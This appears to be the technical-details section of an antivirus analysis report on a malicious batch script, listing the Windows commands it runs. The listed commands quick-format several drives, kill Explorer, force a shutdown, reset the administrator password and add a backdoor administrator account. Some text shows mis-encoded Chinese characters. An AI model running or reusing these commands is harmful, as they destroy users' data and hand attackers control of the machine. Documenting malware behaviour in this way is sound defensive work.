Техническая информация
- '<SYSTEM32>\format.com' g:/q/y
- '<SYSTEM32>\format.com' d:/q/y
- '<SYSTEM32>\net1.exe' localgroup ╥к├▄┬ы╝╙QQ965386166
- '<SYSTEM32>\format.com' e:/q/y
- '<SYSTEM32>\taskkill.exe' /f /t /im explorer.exe
- '<SYSTEM32>\shutdown.exe' -s -t 10 -c ╡ч─╘╠л╡═╝╢гб╬┤╣╪▒╒╔▒╢╛╚э╝■гб╧╡═│┤э╬єгбгбгб
- '<SYSTEM32>\format.com' f:/q/y
- '<SYSTEM32>\net.exe' localgroup ╥к├▄┬ы╝╙QQ965386166
- '<SYSTEM32>\net1.exe' user administrator 965386166hehe
- '<SYSTEM32>\net.exe' user administrator 965386166hehe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\w7u.bat" <Полный путь к файлу>"
- '<SYSTEM32>\net.exe' user ╥к├▄┬ы╝╙QQ965386166 965386166hehe /add
- '<SYSTEM32>\net1.exe' localgroup administrators ╥к├▄┬ы╝╙QQ965386166
- '<SYSTEM32>\net.exe' localgroup administrators ╥к├▄┬ы╝╙QQ965386166
- '<SYSTEM32>\net1.exe' user ╥к├▄┬ы╝╙QQ965386166 965386166hehe /add
- %WINDIR%\Explorer.EXE
- <SYSTEM32>\ctfmon.exe
- \Device\FileDisk\FileDisk0
- %TEMP%\1.tmp\w7u.bat
- ClassName: '' WindowName: ''